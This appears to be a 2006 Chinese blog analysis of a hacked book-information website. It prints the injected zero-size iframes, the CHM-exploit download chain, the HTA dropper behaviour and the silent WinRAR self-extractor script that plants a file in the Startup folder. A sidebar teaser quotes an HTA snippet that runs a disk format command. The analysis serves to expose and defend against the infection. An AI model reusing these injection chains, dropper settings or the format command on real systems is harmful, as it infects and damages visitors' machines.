某图书信息网被加入恶意代码

最新推荐文章于 2024-06-07 23:47:38 发布
最新推荐文章于 2024-06-07 23:47:38 发布 · 146 阅读 · 0
文章标签:

#操作系统

本文分析了一种利用CHM文件格式漏洞传播恶意代码的方法。恶意代码通过在图书信息网页中嵌套iframe加载,最终导致下载并执行恶意文件caohui.css。此文件是一个WinRAR自解压文件,其目标是在特定目录下释放一个名为dnserror.htm的文件。

endurer 原创

2006-11-08 第1

该图书信息网首页首部被加入代码:

<iframe src=hxxp://www*.book***info**.com.cn/change.htm width=0 height=0 frameborder=0></iframe>

change.htm 的内容为:
/--------
<html>
<iframe src="hxxp://www*.book***info**.com.cn/ind/caohui.htm" width="0" height="0" frameborder="0"></iframe>

<iframe src="hxxp://hk.myblog.yahoo.com/f*4-stu**dent*" width="0" height="0" frameborder="0"></iframe>

<iframe src="hxxp://blog.q**oo*z*a.hk/tmcf4student/" width="0" height="0" frameborder="0"></iframe>
</html>
--------/

hxxp://www*.book***info**.com.cn/ind/caohui.htm 的内容为加入多余空格的利用CHM漏洞的恶意代码,会下载2个文件:


1、caohui.gif 为加入多余空格的脚本程序,文件长度为 117 KB (120,006 字节),功能为:创建并运行c:/caohui.hta。
c:/caohui.hta的功能为:
1)从IE临时文件夹中寻找caohui.css,复制为C:/soft.exe并运行。
2)创建文件c:/wins.bat来删除自己。

caohui.css 其实是一个WinRAR制作的自解压文件,文件长度为 20,006 字节,解压脚本为:
/--------
包含; 下列註解包含自解檔指令碼命令

Path=C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/
SavePath
Silent=1
Overwrite=1
--------/

把文件解压到C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/ 下……

这对使用简体中文版的Windows用户不起作用罢?^_^!

包中的文件为 dnserror.htm,文件长度为 3,260 字节,其中包含代码:

/--------
<iframe src="hxxp://home.tmcss.edu.hk/~t*m*c-02**016/change.htm" width="0" height="0" frameborder="0"></iframe>
--------/

iteye_6637
关注
972信息检索 | 第九章 网络信息检索与利用中的有关问题
是希望的博客
12-08 742
为什么要对网络信息进行选择与评价?信息数量庞杂而无序信息的不稳定性强网络安全存在隐患用户图书情报领域的机构或个人学科专家第三方对网络信息内容的评价美国图书馆协会的免费网络信息资源选择标准美国因特网侦察项目的选择标准英国学科信息门户收录资源的标准因特网公共图书馆的标准美国南加州大学教授Robert美国乔治大学教授Gnenr美国康斯威星大学的10C标准网络信息的评价维度:what & why ?by whom?where?for whom?when?how?in what way?how much?in com
AI算力网络与通信领域共识机制的设计思路
最新发布
AI天才研究院
06-05 800
在"云-边-端"协同的AI时代,算力不再集中于中心云服务器,而是像星星一样散落在数据中心、边缘基站、智能终端甚至车载设备中。如何让分布在不同位置、属于不同所有者、性能参差不齐的算力节点,就"谁来处理任务"“如何分配资源”"结果是否可信"等问题达成一致。本文将聚焦这一问题,探讨AI算力网络与通信领域共识机制的设计思路。本文将按照"场景引入→概念拆解→原理分析→实战验证→趋势展望"的逻辑展开:先用社区共享图书馆的故事引出核心问题;再拆解AI算力网络和共识机制的核心概念;接着用数学模型和代码示例讲解设计原理;
HTTP网页错误代码大全带解释
weixin_33672400的博客
11-12 549
HTTP网页错误代码大全带解释 HTTP 400 - 请求无效HTTP 401.1 - 未授权:登录失败HTTP 401.2 - 未授权:服务器配置问题导致登录失败HTTP 401.3 - ACL 禁止访问资源HTTP 401.4 - 未授权:授权被筛选器拒绝HTTP 401.5 - 未授权:ISAPI 或 CGI 授权失败 HTTP 403 - 禁止访问HTTP 403 - 对 Intern...
网站恶意代码公开
热门推荐
殷高兴的专栏
03-19 5万+
A、死循环代码:『把下列代码加入到网页中,可达到如上效果』说明:当含有这段代码的网页被人点击,连接就会不断的打开IE浏览器,直到你的系统资源浪费到0%~只有重新启动才能正常使用!预防方法:禁用所有的ActiveX控件和插件!因为这是一个ActiveX教本程序~B、恐怖的大图片:『把下列代码加入到网页中,可达到如上效果』说明:当打开这样的网页,IE会不断的解释试图打开,但由于图片实在太大,超出了其处
最近练手的最恶心的网页(MD这么长的代码)。。。
Run_the_youth的博客
03-06 770
简单下拉菜单的实现。。。 <select class="z2"> <option value="xz">请选择</option> <option value="bj">北京</option> <option value="sh">上海</option> <option value="xa">西安</option> </select>
网页恶意代码全集大观
生活要精彩
02-23 2万+
大家上网时自己的IE有时不知怎么回事,首页、标题栏等各项都改成他们的宣传和广告,十分让人头疼,现在把他们的内幕提示出来!   其实这些都是利用了ACTIVE和JS做到的,我们来看这段危险代码。如果浏览了这个网页的话IE跟系统都会被修改得不象样,仅仅可以使用WINDOWS的基本程序。够狠的了。    下面的java程序究竟在搞什么鬼?我们来逐步分析它: //启动ActiveX,以便可以
河南大学恶意代码试卷
01-05
如果可能的话,联系河南大学校内图书馆员咨询是否有纸质版或电子版的恶意代码科目试卷存档[^1]。 #### 3. 教育资源共享平台查询 一些在线教育平台上也可能存在由该校师生上传分享的教学文件夹,里面或许能找到所需...
图书信息管理系统app源码和设计报告(包调试成功)
m0_73546099的博客
06-07 881
本文所进行研究的内容,是建立在上文的研究背景以及研究意义的基础之上的,对现实的图书图书信息的录入、查询、借出、管理以及订阅等流程进行仔细的研究,从而可以设计出一种不仅方便图书管理者完成图书馆中的各种图书信息管理的工作,而且可以满足借阅者方便快捷的查询、借阅以及归还图书功能的一款基于Android的移动设备的应用软件,使得图书管理员的日常工作得到很大的便利以及使得图书借阅者的生活需要得到大大的满足,进一步提高他们的工作效率以及节约他们日常生活的时间。借阅图书功能主要完成用户对需要的图书进行借阅的功能;
十七项网页恶意代码,别去害人啊!
domino的专栏
01-27 1万+
1、格式化硬盘 scr.Reset(); scr.Path="C://windows//Men?inicio//Programas//Inicio//automat.hta"; scr.Doc="wsh.Run(start /m format a: /q /autotest /u);alert(IMPORTANT : Windows is configuring the system. Pl
网站流氓
02-18
网站流氓
IIS 错误代码大汇总
箫箫博客
10-14 2294
400 无法解析此请求。  401.1 未经授权:访问由于凭据无效被拒绝。   401.2 未经授权: 访问由于服务器配置倾向使用替代身份验证方法而被拒绝。   401.3 未经授权:访问由于 ACL 对所请求资源的设置被拒绝。   401.4 未经授权:Web 服务器上安装的筛选器授权失败。   401.5 未经授权:ISAPI/CGI 应用程序授权失败。   401.7 未经授权:由于 Web
不良代码展示-很多判断的写法-给新手
yihui823的专栏
09-22 1万+
原创文章,如有转载,请注明出处:http://blog.youkuaiyun.com/yihui823/article/details/6801695 今天Review代码,看到了一串很“漂亮”的代码。这里把代码改了一下,贴给新手们,作为一个教训吧。 漂亮的意思,是有很工整的缩进。 package com.hoperun; import android.view.View; import an
不良代码示例和优良代码示例
xiaoxin888888的专栏
04-24 1万+
package com.hisuper.richTextChat.view { import avmplus.getQualifiedClassName; import com.hisuper.richTextChat.inter.impl.BaseChatSyncOpImpl; import com.hisuper.richTextChat.manager.BaseOpChatMa
一个被加入下载QQ盗号木马Trojan.PSW.QQPass.rie代码的网站
Purpleendurer@优快云
01-30 5440
endurer 原创2007-01-30 第1版该网站首页被加入代码:/-------<IFRAME src="hxxp://***.v**1*8***0.net/qq/" frameBorder=0 width=0 height=0></IFRAME>-------/打开该URL,没有显示内容,但网页中的VBScript代码会利用 Microsoft.XMLHTTP 和 scrīpt
iframe嵌套其它网站页面 全屏设置
不畏惧被人讨厌而是勇往直前,不随波逐流而是激流勇进,这才是对人而言的自由。
08-31 1万+
今天在使用iframe时,发现嵌套页面中有个【全屏】功能,不好使,查了一下,发现iframe还有1个属性allowfullscreen设置,可以设置是否支持全屏,默认是false,现在把iframe的基础属性整理一下。 iframe基本属性 通常我们使用iframe主要设置src,宽、高,是否滚动,其实有一些不常用的属性 <iframe src="https://www.baidu.com" frameborder="0" width="80%" height="500px"><.
记录某大门户网站自动跳转不良网站,团队通宵排查病毒木马全过程
毕竟我是大神的博客
08-01 1249
某大门户网站被挂马,从搜索引擎结果点击网站,自动跳转不良网站,团队通宵清理病毒,把代码翻遍竟然没有任何发现,最后发现竟然和代码无关。
恶意代码--pdf文件格式解析与恶意攻击脚本分享
关注互联网安全的小虾米一枚
10-18 7006
0x01 pdf文件   至于整个格式adobe公司已经有相应的公开文档,同时网上的资料也很多都能查阅到。   比如文件格式 :    http://www.2cto.com/Article/201011/77380.html   http://baike.baidu.com/link?url=xxI9mMNs28qKwpqJ0OX-fApWoubQH2hw9qq-GdvtYse9...
恶意PDF文档分析记录
weixin_30737363的博客
07-21 381
0x1 PDF是什么 PDF(便携式文件格式,Portable Document Format)是由Adobe Systems在1993年用於文件交换所发展出的文件格式。 因为PDF的文件格式性质广泛用于商业办公,引起众多攻击者对其开展技术研究,在一些APT(Advanced Persistent Threat)攻击中。针对特定目标投递含有恶意代码的PDF文档,安全意识薄弱的用户只要打开...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值